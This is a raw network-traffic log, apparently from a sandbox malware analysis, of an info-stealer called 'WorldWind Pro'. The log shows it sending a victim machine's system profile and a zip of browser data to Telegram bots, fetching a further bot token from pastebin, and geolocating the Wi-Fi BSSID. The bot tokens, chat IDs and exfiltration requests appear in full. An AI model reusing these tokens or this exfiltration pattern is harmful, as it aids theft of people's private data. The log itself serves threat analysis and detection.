2024-07-06 11:28:41 UTC	171	OUT	GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-07-06 11:28:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:42 GMT Content-Type: application/json Content-Length: 297 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-06 11:28:42 UTC	297	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 33 32 32 2c 22 74 65 78 74 22 Data Ascii: {"ok":true,"result":{"message_id":26314,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265322,"text"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49891	172.67.196.114	443	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:43 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-07-06 11:28:43 UTC	784	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:43 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 3 Last-Modified: Sat, 06 Jul 2024 11:28:40 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EpAwUFQmWr0WrplmPANU88fpalGuCfhERd46MJO5KmvZQLx3BHWLjfYl6pUHOwhGu4UZCGxRs2DPGiNWkFl7xv5ezYic64vJ71vz9cetdMstRdZVEDjig%2Foy0qBGFL%2B8S8zR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 89ef40c04c7372a7-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:28:43 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 30 32 36 35 33 32 30 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1720265320}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49890	149.154.167.220	443	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:44 UTC	254	OUT	POST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1 Content-Type: multipart/form-data; boundary="4218323f-0b5f-4f02-ae6c-04af12749150" Host: api.telegram.org Content-Length: 142488 Expect: 100-continue
2024-07-06 11:28:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-06 11:28:44 UTC	40	OUT	Data Raw: 2d 2d 34 32 31 38 33 32 33 66 2d 30 62 35 66 2d 34 66 30 32 2d 61 65 36 63 2d 30 34 61 66 31 32 37 34 39 31 35 30 0d 0a Data Ascii: --4218323f-0b5f-4f02-ae6c-04af12749150
2024-07-06 11:28:44 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C3f9e073e7640535ca31a09fed4e39f55%5Cuser%40134349_en-
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 05 51 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PKQXBrowsers\Edge\PKo;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKo;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 51 40 44 Data Ascii: k0_g=Vbj4\|`@+t,H~!WXRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC\|Wm<{^-};XQTKoJJ{_;PKQ@D
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 Data Ascii: fn=Smxh\|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4Grabber\DRI
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 Data Ascii: uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5Grabber\DRI
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc f3 72 0f 31 57 f0 87 6a 2f 48 20 2c Data Ascii: \|6,?.zgmo&x?e?>h@v.Hn\|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_r1Wj/H ,
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55 8a 13 e6 9b b8 2c 8b 2c e2 69 30 3b Data Ascii: ;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK)Ki>YlB.5+5hnciF!&\|fFtv[O(xeUPQdkCARB"u!v{kMj\|f7}Q]U,,i0;
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: 95 de 41 aa d2 7b ef 25 39 3b 09 f8 fa fe be 6f 9c 73 ef 1d f7 9e f3 cf 1d 83 30 b2 b3 77 d6 da d9 6b cd 39 9f 39 d7 5c f3 d9 25 f8 bc a8 eb a8 06 b9 fd 33 ff fd 96 4e 10 b5 3e ae 8a d0 a1 96 57 2a 32 d5 7b 1c 19 58 b6 5c 4a fb 74 bd d0 2c 9e d7 05 1f 5a 47 43 49 fb d5 e4 3e 5e 41 d6 8c fe ce 68 74 a5 8a 1e 6e 64 60 86 fa 7b bd a6 9c c5 cb 10 a6 9a a7 65 fe 1d 5a 24 7c a3 b8 22 9e 56 0a df cb 71 47 a4 a2 5b a5 2a 2b 19 f9 7e 7c f2 ec 5f f3 6f d7 fe d2 67 6d f4 fd 5b 8f 79 fb f4 86 2c 3e 8c ce 06 07 32 1d fa b5 e6 5d ce 4b be 67 34 f8 c9 72 15 dc bb 88 94 e2 03 8f c2 12 6f ef 60 af d2 f6 7b ac 4a 5b 2e 22 26 f0 94 2a c0 11 b0 64 3d de fd 84 02 d5 d6 20 1b 0b ab 21 28 d0 4d 01 14 28 9f f1 a0 d4 7c b5 06 39 9b 87 02 c1 4b 93 26 55 0e 2e 64 9d d8 31 b4 7f 14 Data Ascii: A{%9;os0wk99\%3N>W2{X\Jt,ZGCI>^Ahtnd`{eZ$\|"VqG[+~\|_ogm[y,>2]Kg4ro`{J[."&*d= !(M(\|9K&U.d1
2024-07-06 11:28:44 UTC	16355	OUT	Data Raw: ba bd f6 fc 64 5c d8 2e de 79 60 3c e5 4d 95 d1 61 cf c4 dc 1e 7d 02 d8 6d 65 e6 2b e2 5c 8d 9d 2d ad d5 84 55 e8 ec 4f c7 32 08 ab 87 51 31 81 12 d2 ea 49 63 93 b8 cd 14 3b 8f 6b 93 88 65 cd b0 ad c9 86 61 02 dd 96 55 e1 44 7b 6e 5b 2c 31 a3 7c 59 18 28 d4 f4 92 24 32 37 24 95 ec 47 87 e4 58 fb ed a5 4d e4 bb e1 22 64 4d fe eb 0c 35 43 85 ec 6f 05 df 7e 79 de a2 0a ad 16 64 cf 1d 9f d5 83 0f 16 b7 f0 e0 b2 3d 82 c9 de 5a ee 54 7d 72 80 a3 1e cd 1c 62 b9 48 49 33 53 7f 58 ba 39 66 65 d7 79 fd 04 ae db 44 52 c4 65 c2 f2 88 d2 e4 d2 cb 5c 71 0b fe 70 a9 70 b9 61 7b 8b 11 3d 6f 83 9a 02 6e 49 44 b7 65 54 7c 69 94 7b b5 ae 5a c4 f0 ae 5c 5b 9a 40 d0 10 87 c3 16 3f 48 0a 57 12 cf 8e fa 86 6f a2 16 bd 2f a3 05 4d 59 46 ba 7e fb cb ae 2f ab 02 6b a5 d5 c5 fc ac Data Ascii: d\.y`<Ma}me+\-UO2Q1Ic;keaUD{n[,1\|Y($27$GXM"dM5Co~yd=ZT}rbHI3SX9feyDRe\qppa{=onIDeT\|i{Z\[@?HWo/MYF~/k
2024-07-06 11:28:44 UTC	902	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:44 GMT Content-Type: application/json Content-Length: 514 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":26315,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265324,"document":{"file_name":"C_UsersuserAppDataLocal3f9e073e7640535ca31a09fed4e39f55user@13.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAJmy2aJKmxPtZ9nDox_DXkTCZO5YzgTAAIfFQACgL9JUFhnsdejxsvtNQQ","file_unique_id":"AgADHxUAAoC_SVA","file_size":142139}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49892	149.154.167.220	443	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:44 UTC	1720	OUT	GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20d [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-07-06 11:28:44 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:44 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-06 11:28:44 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 35 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 915"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49894	149.154.167.220	443	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:45 UTC	171	OUT	GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-07-06 11:28:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:45 GMT Content-Type: application/json Content-Length: 297 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-06 11:28:45 UTC	297	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 33 32 35 2c 22 74 65 78 74 22 Data Ascii: {"ok":true,"result":{"message_id":26316,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265325,"text"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49895	172.67.19.24	443	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:45 UTC	74	OUT	GET /raw/7B75u64B HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-07-06 11:28:45 UTC	398	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:45 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1487 Last-Modified: Sat, 06 Jul 2024 11:03:58 GMT Server: cloudflare CF-RAY: 89ef40cc2cd3c439-EWR
2024-07-06 11:28:45 UTC	52	IN	Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
2024-07-06 11:28:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49898	149.154.167.220	443	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:46 UTC	254	OUT	POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1 Content-Type: multipart/form-data; boundary="5b073ce5-982c-4d6f-86c1-5eb9016cb213" Host: api.telegram.org Content-Length: 142488 Expect: 100-continue
2024-07-06 11:28:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-06 11:28:46 UTC	40	OUT	Data Raw: 2d 2d 35 62 30 37 33 63 65 35 2d 39 38 32 63 2d 34 64 36 66 2d 38 36 63 31 2d 35 65 62 39 30 31 36 63 62 32 31 33 0d 0a Data Ascii: --5b073ce5-982c-4d6f-86c1-5eb9016cb213
2024-07-06 11:28:46 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C3f9e073e7640535ca31a09fed4e39f55%5Cuser%40134349_en-
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 05 51 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PKQXBrowsers\Edge\PKo;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKo;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
